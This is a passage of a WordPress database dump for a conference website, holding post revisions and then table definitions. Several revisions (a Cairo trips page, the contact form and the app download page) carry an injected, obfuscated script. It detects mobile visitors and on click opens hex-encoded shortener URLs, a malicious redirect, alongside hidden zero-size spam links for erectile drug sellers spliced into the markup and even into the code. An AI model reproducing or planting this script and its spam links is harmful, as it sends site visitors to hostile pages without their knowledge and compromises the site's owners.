Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Fun Trips in Cairo','','inherit','closed','closed','','5430-revision-v1','','','2023-10-03 13:30:00','2023-10-03 13:30:00','',5430,'https://gsw2023.com/?p=5499',0,'revision','',0),
(5500,0,'2023-10-03 13:30:00','2023-10-03 13:30:00','[fluentform id=\"1\"]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialismo.com/\">犀利士</a>\n</span>x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialiman.com/\">犀利士</a>\n</span>v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialiman.com/\">犀利士</a>\n</span>]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023 Contact Form','','inherit','closed','closed','','5364-revision-v1','','','2023-10-03 13:30:00','2023-10-03 13:30:00','',5364,'https://gsw2023.com/?p=5500',0,'revision','',0),
(5501,0,'2023-10-03 13:30:00','2023-10-03 13:30:00','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>﻿</span>You may now download the conf4me app and check the conference agenda, hotels, and speakers and stay in touch with important news.\r\n\r\n<button onclick=\"window.location.href=\'https://conference4me.psnc.pl/download/\';\">\r\n\r\n\r\nAfter downloading the app, select ISPRS Geospatial Week 2023\r\n\r\n<img src=\"https://gsw2023.com/wp-content/uploads/2023/08/QR-code-nposter2_Siavash_14May19-726x1024-1.jpg\" alt=\"\" width=\"365\" height=\"512\" class=\"alignnone size-full wp-image-5420\" />\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|n<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.goocialis.cc/\">犀利士</a>\n</span>ok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.viagraseo.com/\">威而鋼</a>\n</span>x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisloc.com/\">犀利士</a>\n</span>365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','DOWNLOAD THE GSW2023 APP','','inherit','closed','closed','','5417-revision-v1','','','2023-10-03 13:30:00','2023-10-03 13:30:00','',5417,'https://gsw2023.com/?p=5501',0,'revision','',0),
(5502,0,'2023-10-03 13:30:00','2023-10-03 13:30:00','<span style=\"font-size:0px; color:<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.levitramall.com/\">樂威壯</a>\n</span>#ff0000;\">﻿<a href=\"https://www.cialisbro.cc/\">犀利士</a>\n</span>','Session Program','','inherit','closed','closed','','5383-revision-v1','','','2023-10-03 13:30:00','2023-10-03 13:30:00','',5383,'https://gsw2023.com/?p=5502',0,'revision','',0);
/*!40000 ALTER TABLE `dnctiavkr_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_pw_gcmusers`
--

DROP TABLE IF EXISTS `dnctiavkr_pw_gcmusers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_pw_gcmusers` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `gcm_regid` text DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `status` tinyint(4) DEFAULT 1,
  `device` varchar(128) DEFAULT 'android',
  `topics` varchar(128) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_pw_gcmusers`
--

LOCK TABLES `dnctiavkr_pw_gcmusers` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_pw_gcmusers` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_pw_gcmusers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_rafflepress_contestants`
--

DROP TABLE IF EXISTS `dnctiavkr_rafflepress_contestants`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_rafflepress_contestants` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `giveaway_id` int(10) unsigned NOT NULL,
  `fname` varchar(191) DEFAULT NULL,
  `lname` varchar(191) DEFAULT NULL,
  `email` varchar(191) NOT NULL,
  `meta` longtext DEFAULT NULL,
  `ip` varchar(255) DEFAULT NULL,
  `referrer_id` int(10) unsigned DEFAULT NULL,
  `winner` tinyint(4) DEFAULT 0,
  `terms_consent` tinyint(4) DEFAULT 0,
  `winning_entry_id` int(10) unsigned NOT NULL,
  `token` varchar(16) NOT NULL,
  `status` enum('unconfirmed','confirmed','invalid') NOT NULL DEFAULT 'unconfirmed',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `deleted_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_rafflepress_contestants`
--

LOCK TABLES `dnctiavkr_rafflepress_contestants` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_rafflepress_contestants` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_rafflepress_contestants` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_rafflepress_entries`
--

DROP TABLE IF EXISTS `dnctiavkr_rafflepress_entries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_rafflepress_entries` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `contestant_id` int(10) unsigned NOT NULL,
  `giveaway_id` int(10) unsigned NOT NULL,
  `action_id` varchar(10) DEFAULT NULL,
  `meta` longtext DEFAULT NULL,
